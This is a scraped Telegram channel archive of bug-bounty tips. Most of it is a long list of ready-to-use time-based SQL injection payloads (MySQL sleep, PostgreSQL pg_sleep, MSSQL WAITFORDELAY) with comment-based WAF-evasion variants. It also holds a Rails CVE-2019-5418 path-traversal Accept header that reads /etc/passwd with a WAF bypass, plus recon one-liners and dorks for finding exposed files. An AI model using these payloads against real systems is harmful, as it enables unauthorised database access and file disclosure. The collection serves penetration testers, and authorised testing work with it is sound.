ch
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

前往频道在 Telegram
7 461
订阅者
+424 小时
+357
+17030
帖子存档
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='

⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug,
⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{ 🛍If the server is deemed to be vulnerable, but a WAF is present: ../../../../../../e*c/p*s*d{{ ✔️Credit- nav1n0x

Google Dorking for Pentesters.pdf1.23 MB

Testing Account Takeover Vulnerabilities.⚔️
Testing Account Takeover Vulnerabilities.⚔️

▶️Automated JS Endpoint Extraction and Verification with HTTPX and GAU echo "target.com" | gau --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg \| grep -E "\.js($|\?.*)" \ | httpx -er "(?:(https?|ftp|git|ssh|telnet|smtp|imap|pop3|ldap|sftp|smb|nfs|rtmp|rtsp|ws|wss|irc|news|gopher|rsync|data):\/\/|\/)[^\s\"'\*\(\){};\\\^\$\&<>/\\?#]+(?:\?[^\s\"'<>/\\?#]+)?(?:\/[^\s\"'<>/\\?#]+)*" \-json -mr "application/javascript|text/javascript" \ | jq -r '.extracts[]' | tr -d '[],'

☄️Information Disclosure Dork☄️ site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)

photo content

☄️HExHTTP - HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities a
☄️HExHTTP - HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors. ⚠️https://github.com/c0dejump/HExHTTP

JavaScript The Definitive Guide - Flanagan.pdf

🔖 اصطلاح "Zero-Day" زمانی استفاده می‌شود که تیم‌های امنیتی از آسیب‌پذیری نرم‌افزار خود بی‌اطلاع باشند و "0" روز فرصت داشته باشند تا روی یک پچ امنیتی یا به‌روزرسانی برای رفع مشکل کار کنند. این اصطلاح معمولاً با مفاهیم آسیب‌پذیری، اکسپلویت و تهدید ... . ✍ تهیه شده توسط : تیم ترجمه TryHackBox #ZeroDay @TryHackBox

Plz react if like. 🙏

Delete it

😞 bad!

Which of the following tools can be used for advanced GraphQL API fuzzing and testing?
Anonymous voting

Which curl option disables SSL/TLS certificate verification?
Anonymous voting